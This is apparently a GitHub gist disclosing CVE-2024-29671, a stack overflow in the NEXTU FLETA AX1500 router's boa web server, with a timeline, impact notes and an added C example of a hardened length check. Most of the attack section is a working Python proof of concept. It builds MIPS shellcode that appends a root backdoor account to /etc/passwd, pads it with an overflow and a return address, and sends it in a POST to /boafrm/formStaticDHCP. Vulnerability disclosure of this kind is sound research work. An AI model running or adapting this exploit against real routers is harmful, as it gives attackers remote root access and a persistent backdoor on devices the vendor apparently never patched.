
@laskdjlaskdj12
Last active February 6, 2025 21:49
CVE-2024-29671 POC

NEXTU FLETA Wifi6 Router RCE Exploit POC

This document describes how the CVE-2024-29671 vulnerability was exploited in the NEXTU FLETA AX1500 router firmware.

[CVE ID]
CVE-2024-29671

[Vendor of Product]
NEXTU

[Product]
FLETA AX1500 Wifi6 Router

[Version]
1.0.2

[Vulnerability Type]
Buffer overflow

Vulnerability Description

Execution Environment

This router is built on a little-endian MIPS Realtek SoC.
The target router firmware version is v1.0.2.

The firmware includes an embedded web server named "boa", whose last release was in 2005.
This router nevertheless uses the boa web server to serve the admin web page that configures the router's firmware.

Cause of the vulnerability

The stack overflow is caused by a missing length check in the formStaticDHCP request handler: the contents of the hostname parameter are copied with strcpy() in the formStaticDHCP function at 0x00411c00, so a value longer than the destination buffer overwrites the rest of the stack frame, including the saved return address.
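The missing length check described above, as an added example in C that is neither the gist's own code nor the router's firmware: a constructed handler showing the unbounded strcpy() pattern next to a hardened version that checks the length against the buffer before copying and rejects over-long values. HOSTNAME_MAX, the function names and the form body are assumptions; the firmware's real stack layout and buffer size are not stated on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stack buffer size for the hostname; the page does not give
 * the size the firmware actually uses, so this value is an assumption. */
#define HOSTNAME_MAX 64

/* Locate the value for `key` in an application/x-www-form-urlencoded body.
 * Returns a pointer into `body` (not NUL-terminated) and stores the value
 * length in *len; returns NULL if the key is absent. No percent-decoding. */
static const char *form_value(const char *body, const char *key, size_t *len)
{
    size_t klen = strlen(key);
    const char *p = body;

    while (p != NULL && *p != '\0') {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p != NULL)
            p++;
    }
    *len = 0;
    return NULL;
}

/* The pattern the page describes: strcpy() into a fixed-size stack buffer
 * with no length check. A value longer than HOSTNAME_MAX overwrites the
 * saved registers and return address above the buffer (undefined
 * behaviour), so this function is only ever called here with short input. */
static int static_dhcp_vulnerable(const char *value)
{
    char hostname[HOSTNAME_MAX];

    strcpy(hostname, value);          /* unbounded copy: the bug class */
    return (int)strlen(hostname);
}

/* Hardened form: compare the length with the buffer before copying and
 * reject over-long values instead of silently truncating them. */
int static_dhcp_hardened(const char *value, size_t len)
{
    char hostname[HOSTNAME_MAX];

    if (len >= sizeof hostname)
        return -1;                    /* reject: would not fit with the NUL */
    memcpy(hostname, value, len);
    hostname[len] = '\0';
    return (int)len;
}

/* Request-level check: parse the body, find hostname, apply the bound.
 * Returns the accepted hostname length, or -1 if missing or too long. */
int check_static_dhcp_request(const char *body)
{
    size_t len;
    const char *v = form_value(body, "hostname", &len);

    if (v == NULL)
        return -1;
    return static_dhcp_hardened(v, len);
}

/* Build a constructed request body whose hostname is `n` bytes of 'A',
 * mirroring the shape of the POST body in the POC. Caller frees. */
char *build_oversized_body(size_t n)
{
    static const char prefix[] = "ip_addr=AAA&mac_addr=AAA&hostname=";
    size_t plen = sizeof prefix - 1;
    char *body = malloc(plen + n + 1);

    if (body == NULL)
        return NULL;
    memcpy(body, prefix, plen);
    memset(body + plen, 'A', n);
    body[plen + n] = '\0';
    return body;
}

int main(void)
{
    char *big = build_oversized_body(1282);   /* same filler length as the POC */

    printf("short hostname (vulnerable copy): %d\n", static_dhcp_vulnerable("router1"));
    printf("short hostname (hardened):        %d\n",
           check_static_dhcp_request("ip_addr=AAA&hostname=router1&mac_addr=AAA"));
    printf("1282-byte hostname (hardened):    %d\n", check_static_dhcp_request(big));
    free(big);
    return 0;
}
```

The hardened variant returns an error rather than truncating to HOSTNAME_MAX - 1 bytes, so a request carrying the 1282-byte filler from the POC is refused before anything is written to the stack buffer; a handler that truncated instead would be safe from the overflow but would store a silently altered hostname.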

Exploit explain

If an attacker places shellcode, together with a value that overwrites the saved return address (RET) on the stack, into the 'hostname' parameter of a POST request to /boafrm/formStaticDHCP, arbitrary code is executed.

Vulnerability POC

from pwn import *
from hackebds import *

# id: rOOt
# passwd: pwn3d

def add_user_credential_shell_code():
    context.update(arch='mips', os='linux', bits=32, endian='little')

    cmd = "/bin/sh"
    args = ["sh", "-c", "echo \"rOOt:XJ1GV.nyFFMoI:0:0:root:/:/bin/sh\" >> /etc/passwd"]

    asmcode = shellcraft.mips.linux.execve(cmd, args) + shellcraft.mips.linux.exit()
    shellcode = asm(asmcode)
    return shellcode


shellcode = add_user_credential_shell_code()

print(shellcode)
gap_code = (b'A') * 1282

# insert RET Address by your own
# In this case, the address value is in the video below that execute RCE.
RET_address = (b'\xe0\x4e\xb9\x7f')
stack_gap = (b'B') * 0x180

final_code = gap_code + RET_address + stack_gap + shellcode

import socket
import ssl

# Boa Webserver Connect Address
HOST = '192.168.1.254'
PORT = 443

# TLS context (this rebinds the name `context`; the pwntools context above
# is no longer needed once the shellcode has been assembled)
context = ssl.create_default_context()
context.set_ciphers('HIGH:!DH:!aNULL')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

with socket.create_connection((HOST, PORT)) as sock:
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:

        # Make Request Body
        send_byte = b"ip_addr=AAA&mac_addr=AAA&static_dhcp=%00%00&addRsvIPFlag=%00%00&addRsvIP=%00%00&deleteSelRsvIP=%00%00&modifyRsvIP=AAA&hostname=" + final_code

        # POST Request Header
        headers = (b"POST /boafrm/formStaticDHCP HTTP/1.1\r\n"
                   b"Host: " + HOST.encode('utf-8') + b"\r\n"
                   b"Content-Type: application/octet-stream\r\n"
                   b"Content-Length: " + str(len(send_byte)).encode('utf-8') + b"\r\n"
                   b"Connection: close\r\n\r\n")

        ssock.send(headers + send_byte)

        response = b""
        while True:
            data = ssock.recv(1024)
            if not data:
                break
            response += data

        print(response.decode('utf-8'))

Exploit execution video

CVE-2024-29671.POC.mp4

Impact

This vulnerability leads to remote code execution (RCE) and denial of service (DoS).

Timeline

2024-03-17: Vulnerability reported and CVE number requested
2024-03-22: CVE number assigned - CVE-2024-29671
2024-03 ~ 2024-05: Report delivered to the vendor
2024-05 - : No response from the vendor regarding a security patch for this vulnerability

Discoverer

Ku In Hoe

Assistance in registering this vulnerability

Assistant Prof. Seonghoon Jeong (Sookmyung Women’s University)
